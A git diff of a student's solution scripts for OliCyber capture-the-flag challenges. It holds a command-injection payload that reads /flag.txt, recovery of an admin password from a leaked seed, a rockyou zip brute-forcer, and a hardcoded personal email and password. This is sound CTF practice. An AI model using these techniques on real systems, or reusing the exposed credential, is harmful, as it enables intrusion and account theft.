diff --git a/2048.py b/2048.py new file mode 100644 index 0000000..92c4056 --- /dev/null +++ b/2048.py @@ -0,0 +1,36 @@ +from pwn import * + +host = "2048.challs.olicyber.it" +port = 10007 + +r = remote(host, port) +print(r.recvuntil(b":")) + +q = log.progress("Question: ") +ans = log.progress("Answer: ") + +def computeAnswer(type, arg1, arg2): + operations = { + "SOMMA": lambda a, b: a + b, + "DIFFERENZA": lambda a, b: a - b, + "PRODOTTO": lambda a, b: a * b, + "DIVISIONE": lambda a, b: a / b, + "POTENZA": lambda a, b: a ** b, + "DIVISIONE_INTERA": lambda a, b: a // b, + } + return operations[type](arg1, arg2) + + +for i in range (0,2048): + question = r.recv().decode("utf-8").strip() + q.status(str(i) + ":"+question) + if (len(question) == 0): + print("Error "+ r.recv().decode("utf-8")) + break + #q.status(question) + split = question.split(" ") + answer = computeAnswer(split[0], int(split[1]), int(split[2])) + ans.status(str(answer)) + r.send(str(answer).encode("utf-8") + b"\n") +print(r.recv().decode("utf-8")) + diff --git a/CHAOS/CHAOS.pcap b/CHAOS/CHAOS.pcap new file mode 100644 index 0000000..4891212 Binary files /dev/null and b/CHAOS/CHAOS.pcap differ diff --git a/CHAOS/CHAOS.py b/CHAOS/CHAOS.py new file mode 100644 index 0000000..f6164d0 --- /dev/null +++ b/CHAOS/CHAOS.py @@ -0,0 +1,43 @@ +import pyshark + +# Path al file pcap +capture_file = '/home/sergio/ProgettiProgrammazione/Python/CyberChallenge/CHAOS/CHAOS.pcap' + +# filtro che vogliamo applicare +display_filter = 'tcp.analysis.retransmission' + +# lista dei payload +payloads = [] + +# in questo caso prendo il valore del payload tcp +def extract_payload(packet): + try: + return packet.tcp.payload.raw_value + except AttributeError: + return None + +# apro il pcap +cap = pyshark.FileCapture(capture_file, display_filter=display_filter) + +packet_list = [] + +# salvo i pacchetti in una lista per poterli ordinare in ordine cronologico +for packet in cap: + packet_list.append(packet) +#ordino i pacchetti in ordine cronologico +packet_list.sort(key=lambda packet: packet.sniff_time) + +# estraggo i payload +for packet in packet_list: + payload = extract_payload(packet) + if payload is not None: + payloads.append(payload) + +# chiudo il pcap +cap.close() + +flag = "" +# appendo i payload in una stringa +for idx, payload in enumerate(payloads, start=1): + flag+= chr(int(payload, 16)) +print(flag) diff --git a/Privnotes.py b/Privnotes.py new file mode 100644 index 0000000..d861d56 --- /dev/null +++ b/Privnotes.py @@ -0,0 +1,39 @@ +import requests +import string +import random +import bs4 +import re + +url = "http://privnotes.challs.olicyber.it" +login = "/login" +register = "/register" +users = "/users" +notes = "/notes" + +def get_random_string(length): + # choose from all lowercase letter + letters = string.ascii_lowercase + result_str = ''.join(random.choice(letters) for i in range(length)) + return result_str + +s = requests.Session() + +data = { + "username": get_random_string(7) +} + +r = s.post(url + register, data=data) +r = s.get(url + users) +soup = bs4.BeautifulSoup(r.text, "html.parser") +date = soup.find("time") +date = date.get("raw") +random.seed(float(date)) +password = "".join(random.choices(string.ascii_letters + string.digits, k=16)) +adminCredentials ={ + "username": "admin", + "password": password +} +r = s.post(url + login, data=adminCredentials) +r = s.get(url+ notes) +flag = re.findall(r"flag\{[^}]*\}", r.text) +print(flag[0]) diff --git a/ScoreboardGraph.py b/ScoreboardGraph.py new file mode 100644 index 0000000..068698c --- /dev/null +++ b/ScoreboardGraph.py @@ -0,0 +1,30 @@ +import requests +import bs4 +from fake_useragent import UserAgent + +scoreboardUrl = "https://training.olicyber.it/scoreboard" + +loginUrl = "https://training.olicyber.it/login" + +r = requests.session() + + + +loginData = { + "email":"sergiocibecchini.productivity@gmail.com", + "password":"HJL4Pd&4q26$D8B@" +} +headers = {'User-Agent': str(UserAgent().chrome)} +r.get(scoreboardUrl, headers=headers) +answ = r.post(loginUrl, headers=headers, data=loginData) + +print(answ.text) + +soup = bs4.BeautifulSoup(answ.text, 'html.parser') + +scoreTable = soup.find('table', {'class': 'm-0 text-nowrap table table-striped table-bordered table-hover'}) + +placeScoreDict = {} + +print(scoreTable) + diff --git a/TIMP.py b/TIMP.py new file mode 100644 index 0000000..a4ec7e7 --- /dev/null +++ b/TIMP.py @@ -0,0 +1,18 @@ +import requests + + +url = "http://timp.challs.olicyber.it" +handler = "/handler.php" + +s = requests.Session() + +result = "" + +for i in range (5): + payload = 'dd${IFS}if=/flag.txt${IFS}bs=1${IFS}skip='+str(i*10) + params = { + "cmd": payload + } + r = s.post(url+handler, data=params) + result += r.text +print(result) \ No newline at end of file diff --git a/cicada 1337.py b/cicada 1337.py new file mode 100644 index 0000000..35ff722 --- /dev/null +++ b/cicada 1337.py @@ -0,0 +1,117 @@ +import subprocess +import re + + +def is_prime(number): + if number <= 1: + return False + elif number <= 3: + return True + elif number % 2 == 0 or number % 3 == 0: + return False + + i = 5 + while i * i <= number: + if number % i == 0 or number % (i + 2) == 0: + return False + i += 6 + + return True + +# Path to the image file +image_path = "/home/sergio/Desktop/congratulations.png" + +# Construct the command as a list of arguments +command = ["identify", "-verbose", image_path] + +# Execute the command and capture the output +completed_process = subprocess.run(command, capture_output=True, text=True) + +# Get the captured output +output = completed_process.stdout + +# Print or manipulate the captured output as needed +print(output) + +numbers = re.findall(r'\s-?\b\d+\b\s', output) + +prime = [] + +for number in numbers: + if is_prime(int(number)) and number not in prime: + prime.append(number) +prime = prime[:3] +num = 1 +for i in range (len(prime)): + prime[i] = int(prime[i].strip()) + num *= prime[i] + +print(prime) +print(num) + +text = '''{A KOAN} +A MAN DECIDED TO GO AND STUDY WITH A MASTER +HE WENT TO THE DOOR OF THE MASTER +"WHO ARE YOU WHO WISHES TO STUDY HERE" ASKED THE MASTER +THE STUDENT TOLD THE MASTER HIS NAME +"THAT IS NOT WHO YOU ARE, THAT IS ONLY WHAT YOU ARE CALLED +WHO ARE YOU WHO WISHES TO STUDY HERE" HE ASKED AGAIN +THE MAN THOUGHT FOR A MOMENT, AND REPLIED "I AM A PROFESSOR" +"THAT IS WHAT YOU DO, NOT WHO YOU ARE," REPLIED THE MASTER +"WHO ARE YOU WHO WISHES TO STUDY HERE" +CONFUSED, THE MAN THOUGHT SOME MORE +FINALLY, HE ANSWERED, "I AM A HUMAN BEING" +"THAT IS ONLY YOUR SPECIES, NOT WHO YOU ARE +WHO ARE YOU WHO WISHES TO STUDY HERE", ASKED THE MASTER AGAIN +AFTER A MOMENT OF THOUGHT, THE PROFESSOR REPLIED "I AM A CONSCIOUSNESS INHABITING AN ARBITRARY BODY" +"THAT IS MERELY WHAT YOU ARE, NOT WHO YOU ARE +WHO ARE YOU WHO WISHES TO STUDY HERE" +THE MAN WAS GETTING IRRITATED +"I AM," HE STARTED, BUT HE COULD NOT THINK OF ANYTHING ELSE TO SAY, SO HE TRAILED OFF +AFTER A LONG PAUSE THE MASTER REPLIED, "THEN YOU ARE WELCOME TO COME STUDY' ''' + +# Split the text into an array where each row is an element +text_array = text.split('\n') + +# Remove empty lines +text_array = [line for line in text_array if line.strip()] + +# Print the resulting array +for row in text_array: + print(row) + +indexes = [ + 9, 43, + 19, 50, + 5, 35, + 1, 1, + 14, 41, + 19, 10, + 12, 11, + 7, 44, + 5, 23, + 20, 11, + 6, 58, + 16, 22, + 20, 63, + 8, 12, + 17, 27, + 2, 34, + 9, 4, + 20, 34, + 19, 57, + 15, 35, + 8, 44, + 15, 80, + 18, 29, + 1, 8 +] + +flag = "" + +print(indexes[9]) + +for i in range (0, len(indexes), 2): + flag += text_array[indexes[i] - 1][indexes[i + 1] - 1] + +print(flag) \ No newline at end of file diff --git a/execute-me.py b/execute-me.py new file mode 100644 index 0000000..a3cc1e2 --- /dev/null +++ b/execute-me.py @@ -0,0 +1,6 @@ + + # Open the binary file in read mode +with open('/tmp/execute-me', 'rb') as file: + binary_data = file.read() + text_data = binary_data.decode('utf-8', errors='ignore') + print(text_data) \ No newline at end of file diff --git a/import requests.py b/import requests.py new file mode 100644 index 0000000..d68a931 --- /dev/null +++ b/import requests.py @@ -0,0 +1,9 @@ +import requests +import re + +url = "http://roller.challs.olicyber.it/get_flag.php" + + +r = requests.get(url, allow_redirects=False) + +print(re.findall(r'flag{.*}', r.text)[0]) \ No newline at end of file diff --git a/infiniteServer.py b/infiniteServer.py new file mode 100644 index 0000000..9eff041 --- /dev/null +++ b/infiniteServer.py @@ -0,0 +1,80 @@ +import requests +import bs4 +import re +from pwn import * +url = "http://infinite.challs.olicyber.it/" + +def makeRequest(): + r = requests.get(url) + soup = bs4.BeautifulSoup(r.text, 'html.parser') + return soup + +def getType(soup): + question = soup.find('h2').text + split = question.split(" ") + return split[0] + +def getQuestion (soup): + question = soup.find('p').text + return question + +def solveGrammar (question): + split = question.split('"') + letter = split[1] + word = split[3] + #number of letters in word + res = len(re.findall(letter, word)) + data = { + 'letter': res + } + return data +def solveMath (question): + split = question.split(" ") + num1 = int(split[2]) + split[4] = split[4].replace("?", "") + num2 = int(split[4]) + res = num1 + num2 + data = { + 'sum': str(res) + } + return data +def solveArt (question): + split = question.split(" ") + color = split[5].replace("?", "") + return color+"=" + +r = requests.session() +soup = makeRequest() + +q = log.progress("Question") +a = log.progress("Answer") +t = log.progress("Type") +c = log.progress("Count") +i = 0 +while(True): + i+=1 + c.status(i) + type = getType(soup) + question = getQuestion(soup) + q.status(question) + t.status(type) + if type == "GRAMMAR": + data = solveGrammar(question) + elif type == "MATH": + data = solveMath(question) + elif type == "ART": + data = solveArt(question) + else: + print("Error") + answ = r.post(url, data=data) + a.status(str(data)) + if ("WRONG" in answ.text): + print("WRONG") + break + elif ("flag" in answ.text): + print("FLAG: "+answ.text) + break + soup = bs4.BeautifulSoup(answ.text, 'html.parser') + + + diff --git a/intoLinuxRabbitHole.py b/intoLinuxRabbitHole.py new file mode 100644 index 0000000..4e2ef10 --- /dev/null +++ b/intoLinuxRabbitHole.py @@ -0,0 +1,23 @@ +from pwn import * +import hashlib + +HOST = 'rabbit.challs.olicyber.it' +PORT = 10501 +r = remote(HOST, PORT) + +r.recvuntil(b'Execute:') +val = r.recv().decode().strip().split() + +target = val[2] + +i = 0 +while True: + h = hashlib.sha1(str(i).encode('ascii')).hexdigest() + if h.endswith(target): + r.sendline(str(i).encode()) + print('done') + break + + i += 1 + +r.interactive() \ No newline at end of file diff --git a/melodyInMyHead.py b/melodyInMyHead.py new file mode 100644 index 0000000..7de234c --- /dev/null +++ b/melodyInMyHead.py @@ -0,0 +1,27 @@ +from pwn import * + +host = "melody.challs.olicyber.it" +port = 10020 + + +nonce0 = "02" +right0 = b"0cce6bab87baa7031b69539ac1a211f202fc35cc8f3ac27fdb7e527527310f0e" + +while (True): + r = remote(host, port) + r.recvline() + nonce = r.recvline().decode().strip() + nonce = nonce.split(" ")[1] + if (nonce == nonce0): + r.sendline(right0) + r.recvline() + flag = r.recvline().decode().strip() + print(flag) + break + else: + r.close() + continue + + + + diff --git a/readyPlayerOne.py b/readyPlayerOne.py new file mode 100644 index 0000000..aa71bce --- /dev/null +++ b/readyPlayerOne.py @@ -0,0 +1,28 @@ +import requests +url = "http://rpo.challs.olicyber.it" +dataUrl = url + "/data" +flagUrl = url + "/verify" + +time = 0 + +r = requests.session() + +ans = r.get(url).text + +def makeRequest (r, score, time): + data = { + "p1s" : score, + "p2s" : 0, + "time" : time + } + answ = r.post(dataUrl, data=data) + return answ.text + +for i in range(0, 5): + answ = makeRequest(r, i + 1, i + 10) + print(answ) +answ = r.get(flagUrl).text +print(answ) + + + diff --git a/soundofsilence.py b/soundofsilence.py new file mode 100644 index 0000000..5c65775 --- /dev/null +++ b/soundofsilence.py @@ -0,0 +1,11 @@ +import requests +url = "http://soundofsilence.challs.olicyber.it" + +r = requests.session() + +data = { + "input[]": b'aa' +} + +answ = r.post(url, data=data) +print(answ.text) diff --git a/wordwang.py b/wordwang.py new file mode 100644 index 0000000..a63e05a --- /dev/null +++ b/wordwang.py @@ -0,0 +1,42 @@ +import socket + +def send_tcp_request(host, port, data_list): + try: + # Create a TCP socket + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: + # Connect to the server (host and port) + sock.connect((host, port)) + + # Send the data in the specified order + for data in data_list: + sock.sendall(data.encode()) + response = sock.recv(1024).decode() + print("Received response from server:", response) + + except socket.error as e: + print("Error:", e) + +if __name__ == "__main__": + # Replace 'wordwang.challs.olicyber.it' and 10601 with the target host and port respectively + host = 'wordwang.challs.olicyber.it' + port = 10601 + + # Specify the data in the order you want to send to the server + data_list = [ + "speech\n", + "SPEECH\n", + "spech\n", + "SPEECH\n", + "provide\n", + "one\n", + "one\n", + "one\n", + "one\n", + "WORDWANG\n", + "SPEECH?\n", + "?SPEECH!\n", + ] + + send_tcp_request(host, port, data_list) + +#era molto più stupida di così, bastava fare il nc e vedere dal wireshark cosa mandare, ossia la parola con ! e ? in caps \ No newline at end of file diff --git a/zipCeption/flag.txt b/zipCeption/flag.txt new file mode 100644 index 0000000..bcff92e --- /dev/null +++ b/zipCeption/flag.txt @@ -0,0 +1 @@ +flag{Un0_z1p_d3n7r0_un0_z1p_1mp0551b1l3!} diff --git a/zipCeption/flag0.zip b/zipCeption/flag0.zip new file mode 100644 index 0000000..441622f Binary files /dev/null and b/zipCeption/flag0.zip differ diff --git a/zipCeption/zipCeption.py b/zipCeption/zipCeption.py new file mode 100644 index 0000000..8471436 --- /dev/null +++ b/zipCeption/zipCeption.py @@ -0,0 +1,14 @@ +import os +from pwn import * + +filename = "flag" +l = log.progress("Unzipping") + + +os.system("pwd") + +for i in range (3000, 0, -1): + os.system("unzip flag" + str(i) + ".zip") + os.system("rm flag" + str(i) + ".zip") + l.status(str(i)) + diff --git a/zipCeption2/100.zip b/zipCeption2/100.zip new file mode 100644 index 0000000..d9199f9 Binary files /dev/null and b/zipCeption2/100.zip differ diff --git a/zipCeption2/correct.txt b/zipCeption2/correct.txt new file mode 100644 index 0000000..a68bc19 --- /dev/null +++ b/zipCeption2/correct.txt @@ -0,0 +1,100 @@ +jesus +jasmine +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 +123456 diff --git a/zipCeption2/exploit.py b/zipCeption2/exploit.py new file mode 100644 index 0000000..474e369 --- /dev/null +++ b/zipCeption2/exploit.py @@ -0,0 +1,26 @@ +import os +from pwn import * + +filename = "flag" +u = log.progress("Unzipping") +p = log.progress("Password") +o = log.progress("Output") + +clear = False + +with open("correct.txt", "w") as correct: + for i in range(100, 0, -1): + u.status(str(i)) + with open("rockyou.txt", "r", encoding="latin-1") as f: + for passwd in f: + passwd = passwd.strip() + output = os.system("unzip -P " + passwd + " \'" + str(i) + ".zip\'") + o.status(output) + p.status(passwd) + if output != 20992: + correct.write(passwd+ "\n") + #if (i != 100 and i != 1): + #os.system("rm " + str(i) + ".zip") + break +if (clear): + open('correct.txt', 'w').close()